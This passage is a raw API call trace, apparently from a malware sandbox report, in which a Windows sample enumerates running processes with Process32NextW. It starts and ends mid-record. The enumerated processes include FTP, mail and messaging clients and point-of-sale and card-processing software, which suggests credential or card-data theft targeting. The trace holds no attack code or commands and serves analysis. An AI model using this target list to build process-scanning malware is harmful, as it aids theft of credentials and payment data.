lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.976] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.976] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.977] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.978] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.979] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.979] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.980] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.981] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.982] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.983] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.983] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.984] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.985] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.986] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.987] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.988] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.989] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.990] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="expense.exe")) returned 1 [0106.990] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="restructuring.exe")) returned 1 [0106.991] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="seem.exe")) returned 1 [0106.992] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="und-rica.exe")) returned 1 [0106.993] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fighters.exe")) returned 1 [0106.994] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dimensions flyer.exe")) returned 1 [0106.995] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="des.exe")) returned 1 [0106.996] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="casting.exe")) returned 1 [0106.997] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="morrison-consult.exe")) returned 1 [0106.997] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="targeted.exe")) returned 1 [0106.998] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="modify_vital_consider.exe")) returned 1 [0106.999] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omega hiv.exe")) returned 1 [0107.000] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="strike_grid_ringtones.exe")) returned 1 [0107.001] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reload.exe")) returned 1 [0107.001] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="inner_atomic.exe")) returned 1 [0107.002] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="box_toyota.exe")) returned 1 [0107.003] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="invited-pty-currencies.exe")) returned 1 [0107.052] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0107.054] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0107.055] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0107.056] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0107.056] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0107.057] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0107.058] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0107.059] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0107.060] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0107.060] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0107.061] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0107.062] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0107.063] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0107.064] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0107.064] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0107.065] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0107.066] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0107.067] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0107.068] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0107.069] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0107.069] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0107.070] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0107.071] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0107.072] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0107.073] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0107.075] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0107.076] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0107.077] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0107.079] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0107.080] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0107.081] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0107.082] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0107.083] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0107.085] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0107.086] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0107.087] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0107.088] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0107.089] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0107.090] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0107.091] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0107.092] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0107.093] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0107.095] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="map enquiries.exe")) returned 1 [0107.096] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scenic.exe")) returned 1 [0107.097] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rider.exe")) returned 1 [0107.098] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0107.151] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0107.153] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, 